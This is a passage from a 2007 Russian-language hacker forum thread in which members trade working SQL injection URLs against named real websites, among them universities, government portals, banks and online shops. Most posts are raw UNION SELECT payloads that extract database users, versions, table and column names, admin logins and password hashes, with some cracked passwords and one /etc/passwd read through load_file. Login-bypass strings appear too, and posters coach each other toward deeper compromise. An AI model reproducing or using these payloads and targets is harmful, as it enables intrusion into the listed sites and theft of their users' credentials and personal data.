Просмотр полной версии : SQL Инъекции
halkfild
21.07.2007, 01:53
hттp://www.bluerunventures.com/news_releases.php?nid=-156+union+select+1,2,3,User,Password,user(),7+from +mysql.user/*
pwruser
396bcbca6cf1b3cf
hттp://nam.kiev.ua/kaf/showkaf.php?K=-1+union+select+1,version(),database(),user(),5+/*
hттp://jaguar.com.ua/?navid=1'
не мое.. просто весело что давно уже
hттp://www.president.gov.ge/?l=E&m=0&sm=1&st=0&id=-2269+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
http://partytown.ru/music.php?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21+from+cinema__user/*
http://www.thepalestra.com/music.php?id=-3171+union+select+1,login,id,email,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+users+li mit+3570,1/*
http://library2.fairfield.edu/dblist.php?s=-1+union+select+1,2,3,4,5,concat_ws(0x3a,USER(),DAT ABASE(),VERSION())
read@localhost:library:4.0.20
http://www.treyporter.com/ylt/music.php?id=-5+union+select+1,table_name,3,4,5,6,7+from+informa tion_schema.tables+limit+21,1/*
http://omahanightlife.com/thearts-music.php?p=view&id=-220+union+select+1,2,table_name,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18+from+information_schema.table s+limit+57,1/*
http://www.stavki.info/index.php?page=forum&part=1&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())/*
случайно ткнул,.. странно... не могу найти имя таблицы =\
http://www.uprava.org/section.php?id=-1+union+select+1,0x536e406b3320e2e8e4e8f220e2e0f12 e20cbeeec20efeee4e1e8f0e0f220f2e0e1ebe8f6f3,3,4,5, 6,7/*
Нашел багу в древнем модуле для PHP_Nuke :)
http://www.english4u.dp.ua/modules.php?name=Literature&op=Open&id=-1+union+select+1,2,3,4,5,6,user_password,8,9+from+ nuke_users+where+username=0x446d69747279/*
хэш админа.
в админке привязка к айпи.
ах да, забыл, пасс 'dima'
http://www.myshopasia.com/product_display.php?category_cd=-27+union+select+1,2,3,4,5/*
http://www.wi2wi.com/news_releases.php?nid=-135+union+select+1,2,3,user,User(),6,7+from+mysql. user/*
http://www.wnypolonia.com/directory/listings.php?catid=-16+union+select+1,VERSION(),3,4/*
http://www.mountainx.com/greenbuilding/listings.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,VERSION(),1 3,14,15,16,17/*
http://www.sputnik-video.ru/catalog.php?id=-58+union+select+1,2,3,login,pass,6,7,8+from+users/*
Constantine
22.07.2007, 21:40
/home/amandamc/public_html/lilly/pages/set.php
http://www.lilyandlotus.com/pages/set.php?id=324+union+select+1,2,user(),4,5/*
Shram-spb
22.07.2007, 22:24
http://www.nelson.wisc.edu/dir/profile.php?id=-1+union+select+1,21,3,4,load_file(char(47,118,97,1 14,47,119,119,119,47,110,101,108,115,111,110,47,10 5,110,100,101,120,46,112,104,112)),6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,32,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,31,4,5,6,7,8,9,0,1,2 ,3,4
http://www.wm.edu/niahd/journals/index.php?browse=date&id=-1+union+select+1,2,user(),4/*
http://www2.tju.edu.cn/orgs/alum/sun/fen/advice.php?id=1+union+select+database(),2,3/*
http://www.sadalapk.edu.ee/esileht.php?link=personal&id=opetaja&opid=1+union+select+1,user(),3,4,5,6,7,8,9/*
http://www.gfs.zju.edu.cn/shownews.php?id=1598+union+select+1,2,3,4,5,user() ,7,8/*
http://www.airspirit.org/displayimage.php?id=1+union+select+1,2,3,4,5/*
http://shirley.ru/cat.php?id=-1+UNION+SELECT+user(),2/*
http://www.airspirit.org/displayimage.php?id=1+union+select+1,2,3,4,5/*
Ты бы раскручивал до конца :)
http://www.airspirit.org/displayimage.php?id=1+union+select+1,2,3,4,table_n ame+from+information_schema.tables+limit+50/*
guest3297
23.07.2007, 18:12
NOmeR1
А смысл?
Ты бы раскручивал до конца :)
до конца это рут на серваке.
[cash] он типа не просто подбор столбоц, а до раскрытия данных
*.aero :)
http://www.1class.aero/page.php?id=-21+union+select+1,2,concat_ws(0x3C6272202F3E,DATAB ASE(),USER(),VERSION()),4,5,6/*
http://www.aerometals.aero/photos/get_album.php?id=-9+union+select+1,2,concat_ws(0x3C6272202F3E,DATABA SE(),USER(),VERSION()),4,5
http://cartoons.sev.com.au/index.php?catid=-1+union+select+1,username,3,password,5,version(),7 ,8,9,10+from+user+limit+1,1/*
aka PSIH
25.07.2007, 12:23
http://www.spu.edu/news/enews/tothepoint.asp?id=@@version--
http://www.spu.edu/news/enews/tothepoint.asp?id=(select%20system_user)
http://www.ncat.edu/~artsnsci/ExpandNews.php?Index=1'%20or%201=-1%20union%20select%201,2,3,version(),user(),6/*
http://www.quintademeca.com/content.php?menu_id=-2+union+select+1,2,3,concat_ws(0x3C62723E,VERSION( ),DATABASE(),USER()),5,6,7,8/*
4.1.22-standard
qmeca_db
qmeca_cv@localhost
как всегда((( рут на локалхосте ((
http://jcomm.uoregon.edu/facstaff/Profile.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,user(),database(),version(),14,15,16,17,18,19,20, 21,22,23+from+mysql.user/*
ran@jcomm.uoregon.edu
jcomm
4.1.22-log
groundhog
25.07.2007, 16:47
http://www.vipcamera.net/?go=catalog&cid=17&gid=-1'+UNION+SELECT+USER(),DATABASE(),VERSION()/*
aka PSIH
25.07.2007, 19:00
www.gaithersburgmd.GOV
http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=@@version--
http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(select%20system_user)
http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(SELECT TOP 1 EMAIL FROM ACCOUNTS)--
http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(SELECT TOP 1 PASSWORD FROM ACCOUNTS)--
далее =>
http://www.gaithersburgmd.gov/apps/myGaithersburg
&
http://alert.gaithersburgmd.gov
0nep@t0p
25.07.2007, 21:21
http://provodka.ru/news.php?part=4&id=-669+union+select+1/*
http://www.itmedia.pl/newsy.php?nid=-10+union+select+1,2,concat_ws(0x3C62723E,VERSION() ,DATABASE(),USER()),4,5,6,7
http://www.itmedia.pl/newsy.php?nid=-10+union+select+1,2,table_name,4,5,6,7+from+inform ation_schema.tables+limit+21,1
5.0.33-log
itmedia3
itmedia3@localhost
http://www.gentedeminnesota.com/editorial_det.php?nid=-10+union+select+concat_ws(0x3C62723E,VERSION(),DAT ABASE(),USER()),2,3,4,5,6,7,8
4.1.20
gented_db
hdn_bo_user@neveri.venred.com
http://odim.com.ua/news.php?nid=-10+union+select+1,concat_ws(0x3C62723E,VERSION(),D ATABASE(),USER()),3
4.1.21-standard-log
odimcom_dbodimhost1
odimcom_dbuodimh@localhost
[53x]Shadow
26.07.2007, 01:05
www.mockva.ru - Недвижимость =\
http://www.mockva.ru/search.php?sr_id=-1+union+select+1,2,3,4,5,6,7,concat(version(),0x3a ,user(),0x3a,database()),9,10,11,12,13,14,15,16,17 ,18,19,20,21,22/*
www.mwd.hartford.edu
http://www.mwd.hartford.edu/news.php?id=-12+union+select+1,2,concat(user(),char(58),version ()),4/*
groundhog
26.07.2007, 09:49
http://rus-opt.ru/cgi-bin/exroot_main.pl?id=-1)+UNION+SELECT+1,2,3,concat(USER(),'<br>',DATABASE(),'<br>',VERSION())/*
Кроме этого, на серве в http://rus-opt.ru/phpmyadmin/ стоит дырявый предырявый phpMyAdmin 2.6.4-pl1, подвержен уязвимости удалённого или локального инклудинга.
http://www.fullthreadahead.com/classes/index.php?id=-100+union+select+1,2,table_name,4,5,6,7,8+from+inf ormation_schema.tables+limit+25,1/*
gougle.ru
http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),databa se(),version()),4,5,6,7/*
Путег нашли: /home/gougle/public_html/hotcd.php
А прав нету =)
http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),databa se(),version()),4,5,6,7+from+mysql.user/*
http://www.socket.net/customer/newsletterview.php?id=-74+union+select+1,2,3,4,VERSION(),6/*
http://www.best-credit-card.biz/card-offer.php?id=-1214+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,VERSION(),6 2,63,64,65,66,67,68,69,70,71,72,73,74/*
0nep@t0p
27.07.2007, 21:19
http://law-c.ru/document.php?id=-8461+UNION+SELECT+1,2,3,4,5/*
И
http://www.mosoblduma.ru/index.php?action=more&pid=13&id=-395+order+by+5
Но в последнем при запросе с order by все в норме, а если
http://www.mosoblduma.ru/index.php?action=more&pid=13&id=-395+union+select+1,2,3,4,5/*
То вылазает ошибка в sql синтаксе
geezer.code
28.07.2007, 00:53
И
Но в последнем при запросе с order by все в норме, а если
То вылазает ошибка в sql синтаксе
наверное MySql 3 версии.
http://wristband.mobi/index.php?mode=productdetail&id=-465+union+select+1,2,3,password,5,6,7,8,9,10,11,12 ,13,14,15,16,username,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33+from+users/*
Немного gov :
http://www.monitor-nhsft.gov.uk/publications.php?id=930+union+select+1,user(),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
http://www.equestriancentre.nsw.gov.au/news_detail.php?id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16/*
http://www.chubut.gov.ar/tramites/descripcion_imprimir.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
http://www.parl.gov.mn/detail.php?pid=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://wildlife.utah.gov/watersheds/project/detailed.php?id=-680+union+select+1,2,user(),4/*
http://www.regattacentre.nsw.gov.au/print.php?id=-20+union+select+1,2,3,user(),5,version(),database( ),8,9,10,11,12,13,14,15,16/*
http://gulin.nbyz.gov.cn/news_read.php?id=-2+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13, 14,15,16,17,18/*
http://www.bogota.gov.co/guia/interfaz/ciudadano/VIEW_tramite_print.php?id=-1+union+select+user()/*
Joker-jar
28.07.2007, 17:57
http://www.dvgu.ru/news/shownews.phtml?a=show&id=3437+and+lower(user())=char(0x64,0x76,0x67,0x75 ,0x40,0x77,0x33,0x2e,0x64,0x76,0x67,0x75,0x2e,0x72 ,0x75)
user: dvgu@w3.dvgu.ru
~!DoK_tOR!~
29.07.2007, 01:09
//
http://www.nww.co.ir/gallery/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(us ername,0x3A,userpassword),9,10,11,12,13,14,15,16,1 7%20from%20users
Red_Red1
29.07.2007, 12:23
To 0nep@t0p. По поводу
http://www.mosoblduma.ru/index.php?action=more&pid=13&id=-395+union+select+1,2,3,4,5/*
Тут действительно скуль 3 версии (точнее 32359). И иньекция возможна. Вот как удалось определить версию
http://www.mosoblduma.ru/index.php?action=more&pid=13&id=395+/*!32359+AND+0+*/
Помогла статья http://www.securitylab.ru/contest/212101.php - SQL инъекция в MySQL сервере третей версии.
Но дальше не копал, мороки много если нужно колупай.
З.Ы. Оказываеться не только UNION SELECT :)
http://www.lancerregister.com/store_category.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20/*
_http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,password,user,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38+from+users+where+id= 1/*
[53x]Shadow
29.07.2007, 20:19
Банк "Экспресс-Кредит"
www.expr.ru
http://www.expr.ru/news2/?act=show_news&id=-1+union+select+1,2,version(),user(),5,6,7,8/*
Dominican University of California
http://www.dominican.edu/query/class.php?event_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,convert(con cat(user(),char(58),version(),char(58),database()) %20using%20latin1),11,12,13,14,15,16,17,18,19,20,2 1/*
магазин PIN-кодов
http://popolni.in.ua/shop.php?r=-1+union+select+1,2,3,concat(id,0x3a,pass,0x3a,name ,0x3a,status),5,6,7+from+admins+limit+1,1/*
University of Nairobi // ну да, сегодня универы :(
Подозрение
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID='
Подбираем колонки
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*
Узнаем основную информацию
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,concat(user(),char(58),vers ion(),char(58),database()),3,4,5,6,7,8,9,10,11,12/*
Пятерка. Смотрим таблицы и колонки
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,table_name,3,4,5,6,7,8,9,10 ,11,12%20from%20information_schema.tables/*
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,column_name,3,4,5,6,7,8,9,1 0,11,12%20from%20information_schema.columns/*
Выводим че-нить..
http://www.uonbi.ac.ke/contact_details.php?contactName=Department+of+Huma n+Anatomy&contactID=-1%20union%20select%201,concat(EMAIL,char(58),PASSW ORD),3,4,5,6,7,8,9,10,11,12%20from%20UNIVERSITY_ST AFF/*
Philicio
30.07.2007, 10:13
club.azlk.ru
http://club.azlk.ru/index.php3?mode=showcar&carid=-1+union+select+1,passwd,nick,4,5,6,7,8,9,10,name,1 2,13,14,15,16+from+users+limit+1,1
_http://www.dubinushka.ru/m_files.php?ms_id=-54+union+select+1,concat(login,0x3a,pass)+from+use rs/*
groundhog
30.07.2007, 20:58
На сайтеге http://looperman.com/loops.php
http://looperman.com/loops.php?gid=-1'+UNION+SELECT+USER(),VERSION(),3,DATABASE(),5,6, 7,8,9,10,11,12,13,14,15,16,table_name,18,19,20,21+ FROM+information_schema.tables/*
Dr.Frank
01.08.2007, 12:11
EDU:
http://ctbp.ucsd.edu/workshops/index.php?id=-18%27+union+select+1,version(),username,4,5,6,7,8, 9,10,11,12,13,14+from+users/*
http://journalism.berkeley.edu/events/details.php?ID=397+union+select+1,2,3,4,5,6,7,8,9, user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50,51,52,53,54/*
http://crca.ucsd.edu/views.php?id=-5+union+select+1,version(),concat_ws(0x3a,user,pas sword)+from+mysql.user+limit+0,1/*
stanford?
http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(user()+using+lat in1),7,8,9,10,11,12,13,14,15,16+from+mysql.user/*
root@localhost
http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(concat(user,0x3a ,password)+using+latin1),7,8,9,10,11,12,13,14,15,1 6+from+mysql.user+limit+0,1/*
root:*B8EE85A14FC4800165C57E0B7C18B2CBC1EE3EC8
http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(load_file('/etc/passwd')+using+latin1),7,8,9,10,11,12,13,14,15,16+ from+mysql.user+limit+0,1/*
/etc/passwd
Мой первый пост (вроде не боян):
http://www.ourpeople.ru/db.cgi?p=671'
ну тут все тривиально и неинтересно....
http://www.ourpeople.ru/db.cgi?p=-1%20union%20select%20ID,null,null,null,null,null,N ame,NickName,null,null,password%20as%20WWWPage,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null%20FROM%20Users%20WHERE%20ID IN (1602)
- ибо знак "=" рвет запрос
delay(0)
01.08.2007, 20:51
http://www.xewb.com/
http://www.xewb.com/show_cat.php?cat_id=-1+union+select+1,concat_ws(login,0x3a,password)+fr om+dir_login/*
Load_File работает, ибо рут, как ни странно, имеет File_Priv. :)
user: root@localhost
database: xewbcom_dbroot@localhost
version: root@localhost4.1.20
User&Pass: 4admin:01f8f7cdac8b238f7db655246a8aa894
skidmore.edu
http://www.skidmore.edu/academics/art/artimages/image.php?id=-1%20UNION%20SELECT%201/*
(появляется изображение > смотрим исходный код)
Load_File() работает
user:root@localhost
dukemednews.duke.edu
http://dukemednews.duke.edu/news/article.php?id=-1%20UNION%20SELECT%201,2,3,44444,DATABASE(),6,USER (),55/*
_-Ramos-_
03.08.2007, 19:22
http://www.pubstoronto.com
http://www.pubstoronto.com/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10, 11,12,13,14/**/FROM/**/admin/*
Dr.Frank
03.08.2007, 20:31
http://www.davinciinstitute.com/page.php?ID=-120'+union+select+1,2,version(),concat_ws(0x3a,FNa me,LName,Email,LoginCount,ID,Password),5,6+from+Us ers+limit+0,1/*
GameTrailer:
http://www.gametrailers.com/gamepage.php?id=2606+union+select+1,2,user(),4,5,6 ,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34/*
_-Ramos-_
03.08.2007, 20:50
http://www.boredonasaturdaynight.co.uk/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10, 11,12,13,14/**/FROM/**/admin/*
http://www.drink-spots.com/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10, 11,12,13,14/**/FROM/**/admin/*
Joker-jar
04.08.2007, 15:15
http://board.snegorod.com/index.php?cat=4+union+select+1,2,3,4,5,6,7,8,conca t(,chat.userinfo.name,';',chat.userinfo.realname,' ;',chat.userinfo.email,';',chat.userinfo.city,';', chat.userinfo.country,';',chat.userinfo.url,';',ch at.userinfo.icq_uin,';',dating.users.MPASS,';',dat ing.users.PASS,';',dating.users.IPREG),10,11+from+ chat.userinfo+inner+join+dating.users+on+chat.user info.name=dating.users.NICK+limit+0,1/*&minrat=0&numofpage=13
Более подробно тут :)
halkfild
05.08.2007, 00:52
http://www. edem.lg.ua/?catid=-50+union+select+1,2,3,4,version(),6+/*
http://www. edem.lg.ua/info.php?tid=-1609+union+select+1,2,3,4/*
http://www.sunmar.ru/index.php?act=text&name=emty'+union+select+1,2,version(),user(),datab ase()/*
version 5.0.27
user sunmar@localhost
database sunmar
P.S.
http://www.sunmar.ru/index.php?act=text&name=emty'+union+select+1,2,username,password,data base()+from+users/* :) :)
halkfild
05.08.2007, 01:07
http://www.med03.ru/nws/?nw=-624+union+select+1,2,3,4/*
version 4.0.26-log
database u16567
user u16567@10.10.10.208
Red_Red1
05.08.2007, 01:09
Впервые от меня скуль. .EDU. (кстати почему так ценится эта .еду, до сих пор не пойму) То что не повтор проверял через поиск в теме.
_http://www.sjfc.edu/Calendar/show_detail.asp?calendarname=Academic&view_date=7-August-2007'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATI ON_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('pbcattb l','pbcatcol','achievements','appText','calendar_a cademic'))--
Ну и так далее, может кому интересно расколупать.
З.Ы. Немного не в тему. Не пойму зачем нужна эта тема, кому интересно читать все эти скули... (я думал разве что тренироваться на них :))? И конечно интересует почему за все это дают плюсики? Извините за наивность но интересно.
•••™NO FEAR™•••
05.08.2007, 12:53
http://s-ex.com.ua/news.php?id=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3/*
http://www.gamesector.org/review.php?id=-1+union+select+1,2,version(),4,5,6,7/*
mindw0rk
05.08.2007, 15:37
http://zato.ru/chat/chat.php?uname=1&pwd=1&url=1&email=blablabla@sdfsdgs.com&Submit=1&rdbutton=1&nickcolor=1&rdbutton=1&bigu=1&color='
•••™NO FEAR™•••
05.08.2007, 18:29
http://board.gorod.kr.ua/index.php?id=-1+union+select+version(),2/*
Там форум ипб, странно то, что хеш с солью нельзя вывести : (
http://www.rusfinclub.ru/index.php?news_id=-1572+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(vers ion(!),0x73),0x73),4,5,6,7,8,9+from+users/*
http://ks-sport.ru/?page_id=-9+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version (),0x73),0x73),4,5/*
http://www.msb-bank.ru/index.php?sid=4&did=-4+union+select+version(!)--
http://vc-link.net/index.php?inc=library&a=ne_tot_seo'+union+select+1,convert(version()+usi ng+cp1251),convert(concat(table_name,0x207c20,colu mn_name)+using+cp1251),4+from+information_schema.c olumns+limit+150,150/*
Version: 5.0.19-standard
Кавычки не фильтруются
лоад файл не пашет
Dr.Frank
06.08.2007, 14:07
http://mobilnik.ua/board/?sort=cell%27+union+select+1,2,3,4,5,6,7,8,9,10+fr om+information_schema.tables+limit+0,2/*
Имена колонок не подобрал - поэтому нет вывода(видимо формат даты или еще какая хрень)
Можт кто поможет? =)
_-Ramos-_
06.08.2007, 20:16
http://www.do4money.com/directory.php?ax=list&sub=7&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10, 11,12,13/**/FROM/**/admin/*
http://www.news.mc.duke.edu/news/article.php?id=69+union+select+1,2,3,4,5,concat(us er,0x3a,password,0x3a,host),7,8+from+mysql.user/*
1ten0.0net1
07.08.2007, 19:21
http://www.microsoft.su/site.php?num=-666+union+select+1,2,CONCAT(user(),CHAR(32,58,32), version(),CHAR(32,58,32),database()),4,5,6,7,8,9,0 ,1,2--
1ten0.0net1
07.08.2007, 20:16
http://netscan.research.microsoft.com/AuthorMetrics.aspx?sDT=5/31/2007&sNG=soc.culture.usa'+and(1=1)--&sTP=10
http://netscan.research.microsoft.com/AuthorMetrics.aspx?sDT=5/31/2007&sNG=soc.culture.usa'+order+by+25--&sTP=10
UNION что-то не получается...
http://ability.aol.com/ability/index.php?ID=118&catID=7'
кто полезит дальше?
http://ability.aol.com/ability/index.php?ID=118&catID=-7+union+select+1,2/*
http://free-keywords.com/order/cart/index.php?maincat_id=-1+union+select+1/*
http://gregorypacks.com/prod.php?ID=-6+UNION+SELECT+1,2,username,userpass,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52+from+users/*
http://www.atwebresults.com/scriptstore/cart/index.php?maincat_id=-1+union+select+VERSION()/*
http://www.hampshire.edu/cms/index.php?id=4650'+union+select+1,2,3,4,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22/*
=\
Calcutta
09.08.2007, 06:51
http://p-pm.net/partners/?p=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
подобрал число колонок в таблице (13)
пробовал дальше так как описано в мануалах - ничео не смог вытащить. мож у кого другого получится? (скинул в асю знакомый на сайт с и-нет заработком, а я решил на sql ошибки проверить)
Calcutta
09.08.2007, 08:27
http://www.mountainx.com/greenbuilding/listings.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,VERSION(),1 3,14,15,16,17/*
http://www.mountainx.com/greenbuilding/listings.php?catid=-1+union+select+database(),user(),3,4,5,6,user(),8, 9,10,11,VERSION(),13,14,15,16,17/*
если честно, я не знаю толком что это, просто пытался освоить принцип перебора занваний полей :)
.EDU
http://siovizcenter.ucsd.edu/library/objects/detail.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
http://bin.ru/office_location.php?office_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,table_na me,14,AES_DECRYPT(AES_ENCRYPT(version(),%20%200x71 ),0x71),16,17,18,19+from+information_schema.tables +limit+1,1/*
http://www.yaruse.ru/main.php?page=cvetmet&top=-1+union+select+CONCAT(user,CHAR(32,124,124,32),pas sword),2,3,4,5,6+from+mysql.user/*
http://hns.cm.ru/ доступ к форуму и партнерам:
' or 'a'='a
http://www.wanderinggoblin.com/literaturedetail.php?id=430%20union%20select%201,2 ,3,concat(version(),char(58),user(),char(58),datab ase(),char(58),password,char(58),user),5,6%20from% 20mysql.user/*
БАНК
http://www.moneyburg.ru/
Надо поглубже его проанализировать конечно:
Вход :
login:1' or 1=1/*
pass:неважно
ПРОВАЙДЕР
uralsmart.ru
Опять таки mssql.
Я вижу что скл ругается ......еще вижу строки логин пасс и ввожу запрос типа:
' or 'a'='a
" or 1=1--
or 1=1--
а тока ругается -ХЕЛП
ну и еще:
http://www.chermet-s.ru/mess/?i=1&ii=-1+union+select+1,VERSION(),table_name,4,5,6,7,8+fr om+information_schema.tables/*
и вот опять чо то не выходт...
http://journalism.berkeley.edu/events/details.php?ID=394'+union+select+1,2,3,4,5,6,7,8/*
и вот опять чо то не выходт...
http://journalism.berkeley.edu/events/details.php?ID=394'+union+select+1,2,3,4,5,6,7,8/*
http://journalism.berkeley.edu/events/details.php?ID=394+union+select+1,2,3,4,5,6,7,8,9, version(),11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
имена таблиц сам подбирай.....
Вот есть такое
_http://ksvu.kiev.ua/viewabc.php?letter=0'+UNION+SELECT+1,2,3,4,version (),6,7,8,9,10/*
С MySQL inj работать особо неумею, пробовал подбирать имена таблиц (наверное неправельно) не получилось... Кто может, помогите... Пасиб!
Вот есть такое
_http://ksvu.kiev.ua/viewabc.php?letter=0'+UNION+SELECT+1,2,3,4,version (),6,7,8,9,10/*
С MySQL inj работать особо неумею, пробовал подбирать имена таблиц (наверное неправельно) не получилось... Кто может, помогите... Пасиб!
http://ksvu.kiev.ua/viewabc.php?letter=-1'+union+select+1,version(),3,4,5,6,7,8,9,10+from+ guestbook/*
http://ksvu.kiev.ua/viewabc.php?letter=-1'+union+select+1,version(),3,4,3,6,7,8,9,10+from+ forum/*
Версия мускула четвертая а это уже само по себе геморой..............
Вот тебе пара таблиц а имена полей и другие таблицы ты уже сам...
http://www.beermat.biz/shop_item.php?id=9999+union+select+1,2,3,concat(da tabase(),0x3a,user(),0x3a,version()),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22/*
beermatadmin:beermatadmin@localhost:5.0.22-Debian_0ubuntu6.06.3-log
http://www.beermat.biz/shop_item.php?id=9999+union+select+1,2,3,table_nam e,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 +from+information_schema.tables+limit+16,1/*
a_member
blog
blog_comment
bm_newsletter
bm_recipients
competition
competition_entry
downloads
event
event_attendee
event_category
member(member_id, email_address, password, title, first_name, last_name, job_title, organisation, web_address, post_code, county, town, region, country, industry, newsletter, event_announcements, accept_terms, allow_3p_contact, blog_alerts, member_type_id, expiry_date, subscription_reference, eu_vat_number, profile_text, image, image_height, image_width, member_status, hash_code, session, ip_address, key_value, new_email, added, updated)
mm_newsletter
mm_recipients
mm_recipients_20070121
mm_recipients_20070319
mm_recipients_20070329
mm_recipients_20070501
mm_recipients_20070529
mm_recipients_kick
mm_recipients_old
newsletter
offers
payment_transactions
private_message
shop_cart
shop_catalogue
shop_category
shop_customer
sys_blog_rejection
sys_country
sys_industry
sys_member_type
sys_parameter
sys_profanity
sys_region
sys_title
twatch_agents
twatch_agentsc
twatch_agentsc_mon
twatch_allreadt
twatch_browsersc
twatch_browsersc_mon
twatch_cousc
twatch_cousc_mon
twatch_errors
twatch_general
twatch_hits
twatch_hits_mon
twatch_hourly
twatch_hourly_mon
twatch_ipcou
twatch_ippages
twatch_ipreadt
twatch_ips
twatch_miles
twatch_monreadt
twatch_pages
twatch_pagesc
twatch_pagesc_mon
twatch_paths
twatch_refdoms
twatch_refgroupsc
twatch_refgroupsc_mon
twatch_refs
twatch_refsc
twatch_refsc_mon
twatch_robotsc
twatch_robotsc_mon
twatch_sessions
twatch_sessions_mon
twatch_weekday_mon
http://www.studyinuk.ru/news.shtml?id=3502%20union%20select%201,2,AES_DECR YPT(AES_ENCRYPT(concat_ws(0x3b,user(),database(),v ersion(),id,login,pass),0x71),0x71),4,5,6,7,8,9,10 %20from%20users/*
Alexsize
10.08.2007, 12:17
http://www.mediapool-berlin.de/frameset.php3?Bereich=3&Sprache=d'+and+1=2+union+select+1,2,3,4,version(), 6,7,8,9/*
ПР4
http://auroraforum.stanford.edu/events.php?id=-1+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT (user(),0x71),0x71),8,9,10,11,12,13,14,15,16/*
Едушка
http://www.teriin.org/case_inside.php?id=-17087'+union+select+1,version(),3,4,5,6,7,8,9,10,1 1/*
ПР7
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40+from+informatio n_schema.tables+limit+38,1/*
ПР5
http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(0x12,version(),0x12, user(),0x12),concat(0x21,user,0x21,password),7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*
version:4.1.22
user:boxnews_a2k@localhost
admin:admin
pass(md5):d23d8b79f575bcc0eedfb8c4e2f13540
pass:repz
